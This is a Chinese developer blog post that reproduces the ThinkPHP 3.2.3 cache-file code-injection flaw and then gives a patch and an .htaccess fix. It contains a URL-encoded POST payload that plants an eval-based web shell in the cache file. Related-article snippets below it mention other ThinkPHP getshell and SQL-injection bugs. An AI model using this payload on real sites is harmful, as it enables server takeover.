php tp3.2 慢,ThinkPhp3.2.3缓存漏洞复现以及修复建议

最新推荐文章于 2024-07-11 06:58:52 发布
最新推荐文章于 2024-07-11 06:58:52 发布
阅读量709 收藏
点赞数
文章标签: php tp3.2 慢
本文详细介绍了ThinkPHP 3.2.3框架的一个缓存安全漏洞,通过示例代码展示了如何复现该漏洞,并提出了简单的修复方案。修复方法主要涉及在设置缓存时过滤换行符,防止恶意代码执行。同时,指出在实际开发中,一般不建议将接收的参数直接用于缓存,以降低风险。
摘要由CSDN通过智能技术生成

小编作为一个php(拍黄片)的程序员,今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。

我们这里来复现一下漏洞 后面我会提出修复建议

d3c35fafb7cbab2c0cbf3adad859c954.png

首先我们下载最新的thinkphp3.2.3的框架  搭建好

07e59fa651a3b9938e55764dd3430882.png

按照phpoop牛的审计  我们来写代码

namespace Home\Controller;

use Think\Controller;

class IndexController extends Controller {

public function index(){

$a=I('post.a3');

S('name',$a);

}

}

然后我们来post一段代码

a3=%0A%24a%3deval(%24_POST%5b%27a3%27%5d)%3b%2f%2f

a8df07e273e2fbc125f3bfd4a79f79dd.png

4a92a54c80101bd8673843f465bf2744.png

我们可以看到缓存文件已经出现了

至于这个缓存名称

就是

S('name',$a);

中的name的md5

dce97bc4b9bee67fd52734bae696b44d.png

我们来连接这个一句话

02e60a9368cef5afa6a374ac63755339.png

d3b350dfc2bc1880f59122500740084d.png

我们可以看到

这个漏洞是可以利用的但是这个漏洞比较鸡肋

我们在开发的过程种s缓存一般不会用作接收参数的缓存(me就是 接收过来的参数只查询并不进行其他操作)

详细的讲解了I函数

我们在实际应用的过程当中有详细的解释  比如我们要接收id的时候 id是整数

那么就可以写成I('post.id/d')这样强制转换为整数

33ab0ae6f747278047ce8cc8738a82af.png

实际应用种很少有把接受过来的参数直接缓存起来

修复方案也很简单

用phpoop牛的方法

打开文件:thinkphp\library\think\cache\driver\File.php

public function set($name, $value, $expire = null) 方法

添加:$data = str_replace(PHP_EOL, '', $data);

/**

* 写入缓存

* @access public

* @param string $name 缓存变量名

* @param mixed $value  存储数据

* @param int $expire  有效时间 0为永久

* @return boolean

*/

public function set($name,$value,$expire=null) {

N('cache_write',1);

if(is_null($expire)) {

$expire =  $this->options['expire'];

}

$filename   =   $this->filename($name);

$data   =   serialize($value);

$data = str_replace(PHP_EOL, '', $data); //新增这句代码     修复代码在这里/***********************/

if( C('DATA_CACHE_COMPRESS') && function_exists('gzcompress')) {

//数据压缩

$data   =   gzcompress($data,3);

}

if(C('DATA_CACHE_CHECK')) {//开启数据校验

$check  =  md5($data);

}else {

$check  =  '';

}

$data    = "<?php \n//".sprintf('%012d',$expire).$check.$data."\n?>";

$result  =   file_put_contents($filename,$data);

if($result) {

if($this->options['length']>0) {

// 记录缓存队列

$this->queue($name);

}

clearstatcache();

return true;

}else {

return false;

}

}

2.在Application\Runtime目录中创建文件.htaccess

deny from all

c83a79ee3756d1614f703e6b5d1345e2.png

b1db16e023973efc831f568f14b97cd9.png

weixin_39989941
关注
TP3.2 fetch和display漏洞修复
amaoatao的博客
10-28 672
远程攻击者在无需任何权限情况下,可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到getshell的目的。 一共有两种方式植入: ​​​第一种是通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件 ​​​fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。这里fetch函数的三个参数分别对应模...
【安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1652
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
Thinkphp学习】TP3.2.3在PHP5.5环境下运行非常
weixin_30877493的博客
07-16 691
在做项目时遇到了一个瓶颈问题:老项目迁移到PHP5.5环境后打开网页很卡很。 服务器环境为:apache+php5.5.38+mysql,使用框架为Thinkphp3.2.3。 经过多方面排查找到了问题所在,因此写出来跟大家分享,希望少走我的弯路。 原因是出在Thinkphp连接数据库的时候,其中的config.php配置数据库地址时用了localhost,改成'DB_HOST'=>...
ThinkPHP 3.2漏洞的探讨
最新发布
Li91314的博客
07-11 466
远程代码执行漏洞是由于在模板赋值方法assign的第一个参数可控时,模板文件路径变量被覆盖为携带攻击代码的文件路径,导致攻击者可以执行任意代码。本文将针对ThinkPHP 3.2漏洞进行详细的探讨,分析其产生的原因、影响以及应对策略。作为开发者或网站运营者,我们应重视这些漏洞的存在,并采取相应的应对策略来保障Web应用的安全性。通过升级版本、严格审查代码、加强安全配置以及监控和日志审计等措施,我们可以有效地防范和应对ThinkPHP 3.2漏洞带来的安全风险。四、ThinkPHP 3.2漏洞的影响。
php tp3.2 ,关于 thinkphp3.2 缓存的问题
weixin_39759441的博客
03-19 415
common 文件即生成缓存的主文件,在服务器上是 ok 的本地也是好的但是修改过文件以后,线上直接打一个毫无紧要的回车,前提代码也是 ok 的,服务器上第一次读是 ok 的,但是第二次读取缓存的时候就会有问题但是放上原来的文件又好了现在这个文件就感觉碰不得,一改动就会报错这是在 /var/log/nginx 上的报错信息2016/07/29 18:17:41 [error] 8780#0: *3...
tp3.2 缓存
静如雪的博客
10-23 1876
1.数据缓存  $cat_data=S('catdata');         $res=array();         if(!$cat_data){             $alldata=$this->select();            foreach($alldata as $k=>$v)            {                if($v['par
tp3.2高危漏洞补救
weixin_42979295的博客
01-07 1217
解决方案 第一步: 参考文章地址:https://baijiahao.baidu.com/s?id=1597903534593779874&wfr=spider&for=pchttps://github.com/top-think/thinkphp/commit/7e47e34af72996497c90c20bcfa3b2e1cedd7fa4#diff-a11f090618c5ef...
php3.2 关闭缓存,thinkphp3.2.3 关于缓存导致的getshell
weixin_34541572的博客
03-29 633
在项目中,合理的使用缓存对性能有较大的帮助。ThinkPHP提供了方便的缓存方式,包括数据缓存、静态缓存和查询缓存等,支持包括文件方式、APC、Db、Memcache、Shmop、Sqlite、Redis、Eaccelerator和Xcache在内的动态数据缓存类型,以及可定制的静态缓存规则,并提供了快捷方法进行存取操作。这里就讲框架自带的三种缓存方式!对于白盒来说的话,只要知道Cache的Nam...
tp3.2缓存方式mysql_ThinkPHP 3.2.3 数据缓存与静态缓存
weixin_33499715的博客
01-19 1016
数据缓存使用 S 方法进行数据缓存缓存文件默认的方式是文件缓存(DATA_CACHE_TYPE = File),文件缓存默认的保存路径是 ./Application/Runtime/Temp当使用默认的缓存方式时,不需要在配置文件中进行配置,直接在控制器中需要缓存数据的地方调用 S 方法即可:S(缓存名,缓存值,缓存时间)例如在 IndexController.class.php(./Appli...
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
记一次tp3.2.3因fetch导致的漏洞处理过程
tiancityycf的专栏
06-04 1557
参考:https://www.phpmianshi.com/?id=108 问题描述: 最近发现百度收录大幅度下降,并出现大量5xx错误,有些收录页面直接跳转到其他网站,如下图: 问题追查 1.根据以往经验首先怀疑网站被植入或者挂马 于是排查系统日志,因为php项目的植入基本是通过eval植入的,所以我们直接: grep eval nginx.log 发现类似如下日志: {"@timestamp":"02/Jun...
thinkphp中exec执行时间过长
xkl的博客
04-05 2634
一般是localhost的问题 解决办法在 config配置文件中,数据库服务器别用 localhost 用127.0.0.1
TP5与TP3.X对比
weixin_30446197的博客
09-07 234
首先声明本章节并非是指导升级旧的项目到5.0,而是为了使用3.X版本的开发者更快的熟悉并上手这个全新的版本。同时也强烈建议开发者抛弃之前旧的思维模式,因为5.0是一个全新的颠覆重构版本。 需要摒弃的3.X旧思想 URL的变动 首先对3.X的不严谨给开发者们带来的不正确的引导表示歉意,在5.0版本正式废除类似/id/1方式 可以通过‘get’获取到‘id’的方法,严格来讲这样的url是不属于$...
Thinkphp框架 3.2.x sql注入漏洞
小小猪的博客
11-15 1587
Thinkphp框架 3.2.x sql注入漏洞 环境搭建 程序下载地址:地址PHPstudy:Apache+php7.1+MySQL 工具:PHPstorm 首先建立一个数据库名为:thinkphp 建立一个表名为:user 添加两个字段:name,pass thinkphp3.2版本和之前的5版本略有不同,它的数据库信息文件是在 这个文件:thinkphp/ThinkPHP/Conf/convention.php在这里...
领导说PHP已经过时了,让我滚!!
kali_Ma的博客
06-25 610
前言 作为一名程序员,我们应该都听过这样一个梗:PHP编程语言,是世界上最好用的编程语言~~~但是今天领导让我滚,我不服气写下了这篇PHP入门基础吊打领导。 PHP介绍   PHP又名超文本预处理器,是一种通用开源脚本语言。PHP主要适用于Web开发领域,语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛。其独特的语法混合了C、Java、Perl以及PHP自创的语法。它可以比CGI或者Perl更快速地执行动态网页。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML文档中去.
彻底解决 Windows 下 PHP 响应异常缓的问题
lfod1997的博客
12-08 3056
问题描述 PHP 写的后端程序,一旦涉及数据库操作,响应就会变得异常得(这里的异常是指:同样的程序在 Linux 下执行,速度没有问题),常常需要等待数十秒,但每次的返回结果中,实际用于执行 SQL 查询的时间均短至毫秒量级。 PHP 版本:7.2.25、7.2.13、7.1.33、5.3.3,无论老版本还是目前 7.2 最新的子版本都有一样的问题,看来官方似乎并不想处理。 问题排查 进行查询操...
ThinkPHP3.2.3:Memcache缓存的使用方法总结
李维山的博客
07-13 2527
方法一:原生Memcache的写法public function test1() {     $mc = new Memcache(); //创建Memcache对象     $mc-&gt;connect("127.0.0.1", 11211); //连接Memcached服务器     $mc-&gt;set('test1','hello world',0,10); //存储数据     ec...
TP框架漏洞复现(持续更新)
weixin_51458899的博客
02-25 4558
TP框架漏洞复现 tp起手:下载安装,漏洞复现 下载安装 tp源码在这: https://www.thinkphp.cn/down.html 但b站说官方已经不提供源码下载了,要手动composer或者git composer安装 连的是php7.4.3的exe 环境搭好是这样 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l6Bz8gdI-1645798368511)(https://raw.githubusercontent.com/hmt38/abcd/master/
ThinkPHP3.2ThinkPHP6踩坑记录
qq_22146915的博客
12-29 3316
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。本文记录了博主由ThinkPHP3.2升级到ThinkPHP6踩坑历程
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行)漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值